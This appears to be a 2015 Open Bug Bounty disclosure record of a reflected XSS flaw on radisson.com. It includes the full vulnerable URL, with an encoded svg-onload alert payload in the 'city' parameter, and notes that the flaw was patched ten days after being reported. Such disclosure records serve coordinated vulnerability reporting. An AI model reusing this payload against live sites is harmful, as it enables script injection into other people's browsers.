radisson.com XSS vulnerability

2015-10-15T09:14:00
ID OBB:92215
Type openbugbounty
Reporter Gromak123_XSS
Modified 2015-10-15T09:17:00

Description

Vulnerable URL:
http://www.radisson.com/home/reservation/cityRateSearch.do;jsessionid=7bFqxqRQyeb51eAbcZ5iteYv3titkEm_6VSlL2f3mLIa0DgNTRbO!1604049258?promotionalCode=&rateSearchForm.redemptionSearch=false&newSearch=true&citySearchForm.singleSearchDisabled=false&rateSearchForm.ecertCode=&rateSearchForm.corporateAccountID=&rateSearchForm.travelAgencyId=&rateSearchForm.redemptionCalSearch=false&citySearchForm.country=&citySearchForm.state=&citySearchForm.countryAndState=&citySearchForm.singleTermSearch=true&citySearchForm.usedAutocomplete=false&city=+%22%3E%3Csvg%2Fonload%3Dalert%28%2FXSSPOSED%2F%29%3E&cityId=0&rateSearchForm.hotelCodes=&rateSearchForm.attractionId=0&rateSearchForm.destinationSearchType=&rateSearchForm.checkinDate=10%2F16%2F2015&rateSearchForm.checkoutDate=10%2F17%2F2015&rateSearchForm.numberRooms=1&rateSearchForm.o[0].a=1&rateSearchForm.o[0].c=0&rateSearchForm.numberRooms=1&rateSearchForm.o[0].a=1&rateSearchForm.o[0].c=0&rateSearchForm.rmcCode=&rateSearchForm.smartBox=&rateSearchForm.crossBrandSearch=searchCrossBrand

Details:

Description| Value
---|---
Patched:| Yes, at 25.10.2015
Latest check for patch:| 25.10.2015 16:15 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 32729
Google Pagerank| 8
VIP website status:| Yes
Check radisson.com SSL connection:| (Grade: A-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 15 October, 2015 09:14 GMT
Vulnerability existence verified and confirmed| 15 October, 2015 09:17 GMT